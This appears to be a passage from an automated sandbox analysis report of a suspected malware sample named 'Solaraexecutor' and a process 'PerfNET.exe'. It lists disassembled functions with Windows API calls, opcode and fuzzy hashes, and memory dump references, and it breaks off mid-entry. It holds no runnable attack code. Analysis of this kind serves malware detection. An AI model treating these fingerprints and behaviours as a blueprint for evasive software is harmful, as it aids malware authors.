_wcslen.LIBCMT ref: 00D21182
_wcslen.LIBCMT ref: 00D211A9

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 7e9914e37107c8a98fccc655aef3bbb481048dfa154521afba95deb6002904b6
Instruction ID: 8c1d96bc65e4256e7769797426c2c84edfda8870a6a5453658bb023d12405c16
Opcode Fuzzy Hash: 7e9914e37107c8a98fccc655aef3bbb481048dfa154521afba95deb6002904b6
Instruction Fuzzy Hash: 0341F57190066A9BCB219F68DC0A9EF7BB8EF11710F044029FD46F7245DB30AE488BB4

Function 00D4C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00D491E0,?,00000000,?,00000001,?,?,00000001,00D491E0,?), ref: 00D4C9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D4CA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00D46CBE,?), ref: 00D4CA70
__freea.LIBCMT ref: 00D4CA79

Part of subcall function 00D48E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D4CA2C,00000000,?,00D46CBE,?,00000008,?,00D491E0,?,?,?), ref: 00D48E38

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: cd58df5bab141d5abf98e70287d3993c6ebf4f1fa26b644bca00093eb2124abe
Instruction ID: 84951b4f1400669cce003d3c677a4824f8ca9017dcdffa8952ab3e5fbc12406d
Opcode Fuzzy Hash: cd58df5bab141d5abf98e70287d3993c6ebf4f1fa26b644bca00093eb2124abe
Instruction Fuzzy Hash: 7831B072A1121AABDF25DF74CC42DAE7BA5EB01350F084128FC04E6250EB35CD50CBB0

Function 00D3A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00D3A666
GetDeviceCaps.GDI32(00000000,00000058), ref: 00D3A675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D3A683
ReleaseDC.USER32(00000000,00000000), ref: 00D3A691

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 73854c40de88086c518a536a3151a24547de013c9b03a04f3b041a6b6b79c765
Instruction ID: 40d1077e2f4f8f1e382f917df3f2b0e7c880a1cea09536bf00e158bc9a14b069
Opcode Fuzzy Hash: 73854c40de88086c518a536a3151a24547de013c9b03a04f3b041a6b6b79c765
Instruction Fuzzy Hash: 8EE0EC31962B21A7D2615F65AC0EF8A3E54EB05F52F050201FA09EA3D0DBA486008BB1

Function 00D3A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 00D3A699: GetDC.USER32(00000000), ref: 00D3A69D
Part of subcall function 00D3A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D3A6A8
Part of subcall function 00D3A699: ReleaseDC.USER32(00000000,00000000), ref: 00D3A6B3

GetObjectW.GDI32(?,00000018,?), ref: 00D3A83C

Part of subcall function 00D3AAC9: GetDC.USER32(00000000), ref: 00D3AAD2
Part of subcall function 00D3AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00D3AB01
Part of subcall function 00D3AAC9: ReleaseDC.USER32(00000000,?), ref: 00D3AB99

Strings

(, xrefs: 00D3A9AA

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 17fa2f0c25f9f5b033a46f50738dc80d9341f7435adfc22f3d7d35bf30ed5f58
Instruction ID: 4dd5daffb2c953cb6bd4e0c3117e94a0cfd8b4b770008079184aa477e38e0819
Opcode Fuzzy Hash: 17fa2f0c25f9f5b033a46f50738dc80d9341f7435adfc22f3d7d35bf30ed5f58
Instruction Fuzzy Hash: B891F071608754AFD711DF29C844A2BBBE8FFC9741F00491EF99AD7220DB30A946CB62

Function 00D275DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D275E3

Part of subcall function 00D305DA: _wcslen.LIBCMT ref: 00D305E0

Part of subcall function 00D2A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D2A598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D2777F

Part of subcall function 00D2A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D2A325,?,?,?,00D2A175,?,00000001,00000000,?,?), ref: 00D2A501
Part of subcall function 00D2A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D2A325,?,?,?,00D2A175,?,00000001,00000000,?,?), ref: 00D2A532

Strings

:, xrefs: 00D27654

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: d6ad0fd49d019c1290f827098b162cbdf82535e72542bd4b1d200647f3282139
Instruction ID: eb7078034e25de1f6fcd7d877f0d2b2ec7410378928d33c0b70be9196312a8d2
Opcode Fuzzy Hash: d6ad0fd49d019c1290f827098b162cbdf82535e72542bd4b1d200647f3282139
Instruction Fuzzy Hash: B2418471801268AAEB35EB64DC55EEEB77DEF61304F0440D6B605A3092DB745F89CB70

Function 00D3B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00D3B4E3
_wcslen.LIBCMT ref: 00D3B4FE

Strings

}, xrefs: 00D3B4D6

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 767835bc3a48449f122e31fcbee3a7fec0a7bd039d2f34eed1f40d488f36926f
Instruction ID: 7557d2f2e8cc3d9eddb4b1b5b9940830b6910303c5fcb51a09e67551da77932c
Opcode Fuzzy Hash: 767835bc3a48449f122e31fcbee3a7fec0a7bd039d2f34eed1f40d488f36926f
Instruction Fuzzy Hash: A121DE7290531A5ADB31EA68D845B6EB3ECDF91764F08082BF680C3241EB64DD4883B2

Function 00D2F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00D2F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D2F2E4
Part of subcall function 00D2F2C5: GetProcAddress.KERNEL32(00D681C8,CryptUnprotectMemory), ref: 00D2F2F4

GetCurrentProcessId.KERNEL32(?,?,?,00D2F33E), ref: 00D2F3D2

Strings

CryptProtectMemory failed, xrefs: 00D2F389
CryptUnprotectMemory failed, xrefs: 00D2F3CA

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: d04596d54622d7e24e2dc078ebce20bf502ad5c4d34a5ed6d197376b331965a3
Instruction ID: a2dfbba1e4729ea99bc8caf294cb9933bda1c03f02bfaa5e02077c9dd8155aa7
Opcode Fuzzy Hash: d04596d54622d7e24e2dc078ebce20bf502ad5c4d34a5ed6d197376b331965a3
Instruction Fuzzy Hash: 8A11E432A00739ABDF11AB24E84166E3B64FF25768B084635FC419B351DA74DD0596B4

Function 00D2B991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00D2B9B8

Part of subcall function 00D24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D240A5

Strings

%c:\, xrefs: 00D2B9AE

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: 24447e521778240c315a6ba6db3bbe1c5216fd6e9318bf8c881395a39796e858
Instruction ID: d1879d7955927b21603bbdbefbac518f9356e2c5c65628a359ad461cc276371b
Opcode Fuzzy Hash: 24447e521778240c315a6ba6db3bbe1c5216fd6e9318bf8c881395a39796e858
Instruction Fuzzy Hash: 6B0145631043216ADA306B35AC86D3BB7ACEFA5774B44440BF584D6082EBA0E84486B1

Function 00D3101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,00D31160,?,00000000,00000000), ref: 00D31043
SetThreadPriority.KERNEL32(?,00000000), ref: 00D3108A

Part of subcall function 00D26C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D26C54

Strings

CreateThread failed, xrefs: 00D3104F

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: f1996c985b93321133902941566813b0cc9ac048bec5374759d490bf26e4eab0
Instruction ID: 09b3a235631e67fc9dab531591ecb1f56021f58e810d2fe680ffd9ad2cf77443
Opcode Fuzzy Hash: f1996c985b93321133902941566813b0cc9ac048bec5374759d490bf26e4eab0
Instruction Fuzzy Hash: CC01FE7934430A6FD7346F68AC51B76B398EB50755F24042DF946923C0CEA1A8855634

Function 00D21316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00D2E2E8: _swprintf.LIBCMT ref: 00D2E30E
Part of subcall function 00D2E2E8: _strlen.LIBCMT ref: 00D2E32F
Part of subcall function 00D2E2E8: SetDlgItemTextW.USER32(?,00D5E274,?), ref: 00D2E38F
Part of subcall function 00D2E2E8: GetWindowRect.USER32(?,?), ref: 00D2E3C9
Part of subcall function 00D2E2E8: GetClientRect.USER32(?,?), ref: 00D2E3D5

GetDlgItem.USER32(00000000,00003021), ref: 00D2135A
SetWindowTextW.USER32(00000000,00D535F4), ref: 00D21370

Strings

0, xrefs: 00D21319

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: f981d3c12f0971ed6323f5d83fca7fbb72b0658e97821aecd1ac01349df5836c
Instruction ID: bcd01b36887c1012d101342f956c4a46aec4a4f9ad95d9c3e544d31dc9b7904d
Opcode Fuzzy Hash: f981d3c12f0971ed6323f5d83fca7fbb72b0658e97821aecd1ac01349df5836c
Instruction Fuzzy Hash: 29F081351043A8AADF154F90A80D6A93B5BAF30748F098114FC4990691DB74C994AB30

Function 00D30FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00D31206,?), ref: 00D30FEA
GetLastError.KERNEL32(?), ref: 00D30FF6

Part of subcall function 00D26C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D26C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00D30FFF

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: f691e8ea9e429dece29533f60e2e56dbc31dfd581c27f7f027b0df4cccb1df4d
Instruction ID: e3364a6291c515723ee648aca85d1072ba74752c37598828d1b213e644008973
Opcode Fuzzy Hash: f691e8ea9e429dece29533f60e2e56dbc31dfd581c27f7f027b0df4cccb1df4d
Instruction Fuzzy Hash: 04D02E365083303BCB103728AC0AD6F3C04CB32B73F640B14F838A03F6CA208991A2B2

Function 00D2E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00D2DA55,?), ref: 00D2E2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00D2DA55,?), ref: 00D2E2B1

Strings

RTL, xrefs: 00D2E2AB

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 3262a5ea41cdf8ed56bbeb043b62743ec60b09cbe8524bedbd41ef9e441f469f
Instruction ID: 1df5bcb7f9d78ad5277546cb0a8a23fedbc9d99930346ba9b4374573e93e77c1
Opcode Fuzzy Hash: 3262a5ea41cdf8ed56bbeb043b62743ec60b09cbe8524bedbd41ef9e441f469f
Instruction Fuzzy Hash: DAC012312407106BEA305B797C0DB47AA585B10B96F09044CB941E92D1D6A5C54486B0

Analysis Process: PerfNET.exePID: 6520, Parent PID: 4092COMMON

Execution Graph

Execution Coverage:	6.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9BAB0D4B Relevance: 1.5, Strings: 1, Instructions: 271
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5Z_H, xrefs: 00007FFD9BAB0DF3

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID: 5Z_H
API String ID: 0-3267294416
Opcode ID: a5994e55ae4cf3b6d6ab0545f4a040de1d5c2c85d218793611956b808a7cb30c
Instruction ID: 9de61211aa087f9c77dedc185f3da73d2c540404fda1e3d4423527c3521ad490
Opcode Fuzzy Hash: a5994e55ae4cf3b6d6ab0545f4a040de1d5c2c85d218793611956b808a7cb30c
Instruction Fuzzy Hash: DF91C371A1DAAD4FE759EB6C88797A87FE1EF66314F0501BED059CB2E2CAB81410C740

Function 00007FFD9BEAB7A1 Relevance: 1.8, APIs: 1, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryFullProcessImageNameA.KERNELBASE ref: 00007FFD9BEAB951

Memory Dump Source

Source File: 0000000D.00000002.2901422633.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bea0000_PerfNET.jbxd

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: 01131fa16eda8c162a43bf3bae3712f1d0f8bf5bbf51ee63e41f67b2ac5db08d
Instruction ID: a8c8c2227fee24b91de13e86b23ddb80ba193e1c3de2b0dd7bb8002b56a5147b
Opcode Fuzzy Hash: 01131fa16eda8c162a43bf3bae3712f1d0f8bf5bbf51ee63e41f67b2ac5db08d
Instruction Fuzzy Hash: 1871CF70608A4C8FDB68DF28C8557F977E5FB58311F00426EE84EC72A2CB75A9458B81

Function 00007FFD9BAB08D0 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78bdb56f1dc29db4db271a4895667b0feceb4ac4e27759c6823aaee15d4e4ab4
Instruction ID: bf636b4c27c6f2710a8dd60ab8765daefd27bcfb81feacf82014b96d01548221
Opcode Fuzzy Hash: 78bdb56f1dc29db4db271a4895667b0feceb4ac4e27759c6823aaee15d4e4ab4
Instruction Fuzzy Hash: 8A410A22B0C5690EE318F7BC64B56F97781DF5933AB0445FBD45ECB1D7CD18A8418684

Function 00007FFD9BAB0910 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b4f4c0b0322c833cf0db99c0e705a83f26580f9724ec8646c3af39e61cd66b6
Instruction ID: 32d8137f49a9d08637b015f53e0fea26f311e93e13d1314483a87b51dc2456b0
Opcode Fuzzy Hash: 2b4f4c0b0322c833cf0db99c0e705a83f26580f9724ec8646c3af39e61cd66b6
Instruction Fuzzy Hash: 20412A22B0C6690EE328F7BC64A95F977C1DF5933AB0445BBE45ECB1D7CD18A8418684

Function 00007FFD9BAB0960 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51cbe14d0d43ebd5dc5a1c4813638f714b5e099323c0b8590eb5d87ef2820576
Instruction ID: 58b3878831386c7e656b84fd15e88d56bd1ca9370b1ffdaf892555e5faed596b
Opcode Fuzzy Hash: 51cbe14d0d43ebd5dc5a1c4813638f714b5e099323c0b8590eb5d87ef2820576
Instruction Fuzzy Hash: B031B721B1C92D0FE768B76C646AAF963C1DF5833AF1442BBE41EC71E7CD59AC418284

Function 00007FFD9BAB0998 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f245b0a842226dde17c760c1ee9fb17fc565d2ffc49c8a73700d849c6f1bbce
Instruction ID: 0d93d1604939067923a6b17b988c1a2bf5d4d5c8927b007b5bf81f91122dc041
Opcode Fuzzy Hash: 2f245b0a842226dde17c760c1ee9fb17fc565d2ffc49c8a73700d849c6f1bbce
Instruction Fuzzy Hash: E3214921B1892D0FE798F76C847DA7972C2EF98325F0001B9E41DC32F7DD58AC414644

Function 00007FFD9BAB0C25 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b39e0ec60c50a6c798be20d7d477371d199b7cae7cee5bb2dc997becde457ab
Instruction ID: 10299792a3910156bc52a4e50473ed879d77340b9b84fd22d2195e11209ec05e
Opcode Fuzzy Hash: 5b39e0ec60c50a6c798be20d7d477371d199b7cae7cee5bb2dc997becde457ab
Instruction Fuzzy Hash: FC212932B0D26D8FE332A7B99C611EC7B60EF52325F1541B3D0548B1D3DA786646CB85

Function 00007FFD9BAB12F0 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9673c7498b1153afec43840890dbba05a4ed5be8429bc2a14c2bf99f5a05bbbf
Instruction ID: 16b1c56b8436f3c8b6daad0fc0680202037a091e498ecb08752bcd10b44f410a
Opcode Fuzzy Hash: 9673c7498b1153afec43840890dbba05a4ed5be8429bc2a14c2bf99f5a05bbbf
